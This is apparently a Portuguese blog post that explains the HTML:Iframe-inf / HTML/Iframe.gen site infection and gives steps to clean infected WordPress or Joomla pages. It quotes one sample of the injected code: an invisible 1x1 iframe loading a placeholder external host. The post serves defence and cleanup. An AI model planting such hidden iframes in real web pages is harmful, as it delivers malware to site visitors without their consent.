Nos últimos tempos, vários sites estão sendo atacados com um novo vírus, com o nome de HTML:Iframe-inf ou HTML/Iframe.gen.
Este vírus não tem tanto poder destrutivo, mas se reproduz com muita facilidade. Grandes sites, de empresas, governamentais etc. tem vivido sobre ataque dos “hackers” que vem modificando páginas de sites a fim de que o código malware possa ser distribuído à usuários sem o consentimento do mesmo.
Quando o usuário visita o site infectado, uma conexão invisível é estabelecida com um outro servidor, que por sua vez, pode tentar instalar o malware no computador, podendo assim, gerar spam’s, desfigurar a página, ou até mesmo roubar informações.
Os antivirus tem detectado e bloqueado o acesso à sites infectados, exibindo um aviso, e a tentativa de visitar este site deve ser suspença e deve-se relatar a infecção para os responsáveis pelo site.
No avast o malware é detectado como “HTML:Iframe-inf já no Nod32 é detectado como Trojan HTML/Iframe.gen.
Qual é a aparência desse malware no código da página ?
Bom, no código da sua página, você encontrará algo parecido com isto:
<iframe src="http://xxxxxxxxxx.com/?click=xxxxxxx" width=1 height=1 style="visibility:hidden;position:absolute"> </ iframe>
Quais arquivos são afetados ?
Este malware, infecta principalmente plataformas como WordPress e Joola infectando as páginas em php.
Como remover o malware de minhas páginas ?
- Primeiramente, faça o download das páginas de seu blog/site
- Abra as páginas no bloco de notas e procure pelo código parecido com o código citado acima
- Apague o código que tem o <iframe src=”http://xxxxxx.com/?click=xxxxx…> </iframe>
- Baixe um antivírus, faça o scan completo do seu pc
- Mude a senha do Ftp do seu blog/site
Pronto, malware removido!
